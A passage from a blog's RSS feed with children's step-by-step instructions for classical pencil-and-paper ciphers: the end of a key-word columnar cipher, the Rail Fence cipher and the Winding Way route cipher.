&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 1&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Find out what the KEY word is from the person who sent you the message. Write the letters from the Key word in alphabetical order on a piece of paper.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Draw a column under each letter of the Key word.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Starting under the letter A and writing from left to right, fill in the grid with the letters from the ciphertext.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 3&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Once the grid is filled in, rearrange the columns so the Key word is spelled out correctly. Reading from left to right, you should be able to see the plaintext message.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #990000;"&gt;CONGRATULATIONS!&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;You have successfully deciphered a KEY CIPHER!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Make A Cipher: The Rail Fences</title><link>http://hackrich.blogspot.com/2011/09/make-cipher-rail-fences.html</link><category>ciphers</category><category>coding</category><category>CRYPTOGRAPHY</category><category>cryptology</category><category>education</category><category>study</category><category>The Rail Fences</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 10 Sep 2011 17:20:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-8567028551282508310</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-size: large;"&gt;&lt;b&gt;Make A Cipher: The Rail Fences&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;&lt;b&gt;How to Encrypt a Rail Fence Cipher&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Step 1&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Write down your PLAINTEXT message on a piece of paper.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Then write each letter of the plaintext on two separate lines - the first letter goes on the first line, the second on the second line, the third letter goes back on the first line, and so on.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Count the total number of letters used.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;The total number of letters should equal a multiple of 4 (8, 12, 16, 20). If not, you will need to add extra letters, called NULLS, until it is a multiple of 4.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Step 3&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Beginning with Line 1, combine the letters from both lines to create your CIPHERTEXT.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Divide the letters into as many groups as you like.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #990000;"&gt;&lt;b&gt;CONGRATULATIONS!&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;&lt;b&gt;You have successfully created a RAIL FENCE CIPHER!&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-size: large;"&gt;&lt;b&gt;How to Decrypt a Rail Fence Cipher&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 1&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Divide the letters in half by drawing a line through the ciphertext.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Write the first half of the message on one line and the second half on a new line beneath it. Make sure you leave a space between each letter.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Rewrite the message by combining letters from Line 1 and Line 2.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Make sure that you alternate between lines and leave out any NULLS that are included at the end.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #990000;"&gt;&lt;b&gt;CONGRATULATIONS!&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;&lt;b&gt;You have successfully deciphered a RAIL FENCE CIPHER!&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Make A Cipher: A Winding Way</title><link>http://hackrich.blogspot.com/2011/09/make-cipher-winding-way.html</link><category>ciphers</category><category>CIPHERTEXT</category><category>CRYPTOGRAPHY</category><category>cryptology</category><category>education</category><category>study</category><category>Winding Way Cipher</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Sat, 10 Sep 2011 17:14:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6164715670569201386.post-4616611252556445029</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;How to Encrypt a Winding Way Cipher&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 1&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
Write down your PLAINTEXT message on a piece of paper without any spaces between the words.&lt;br /&gt;
&lt;br /&gt;
Count the number of letters used in the message.&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
Create a MATRIX, or grid, that is large enough to contain your message.&lt;br /&gt;
&lt;br /&gt;
In our example, the message has 22 letters and uses a 4x6 matrix (4 squares wide by 6 squares high), but we could have used a matrix that was 5x5.&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 3&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
Writing from left to right, fill in the boxes of the matrix.&lt;br /&gt;
&lt;br /&gt;
Use a NULL to fill in any remaining boxes in the matrix.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Step 4&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
Determine the shape of the pattern, or path, you will use to encrypt the plaintext.&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;HINT&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
Patterns can start in any corner of the matrix and then move up or down, left or right, diagonally, zig-zag, or spiral throughout the grid.&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 5&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
Draw the pattern lightly over the matrix and then copy the letters as they appear on your chosen path.&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #990000;"&gt;&lt;b&gt;CONGRATULATIONS!&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;&lt;b&gt;You have created a Winding Way Cipher!&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: large;"&gt;How to Decrypt a Winding Way Cipher&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Step 1&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Using the KEY (the number of squares and the type of pattern used to make the grid) that your friend gave you, draw a matrix and fill in the boxes with the CIPHERTEXT.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;If there are any empty boxes remaining, use NULLS to fill them in.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;&lt;b&gt;Step 2&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #351c75;"&gt;Reading from left to right, you can now read the plaintext message.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #990000;"&gt;&lt;b&gt;CONGRATULATIONS!&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span class="Apple-style-span" style="color: #674ea7;"&gt;You have deciphered a Winding Way Cipher!&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;/div&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item></channel></rss>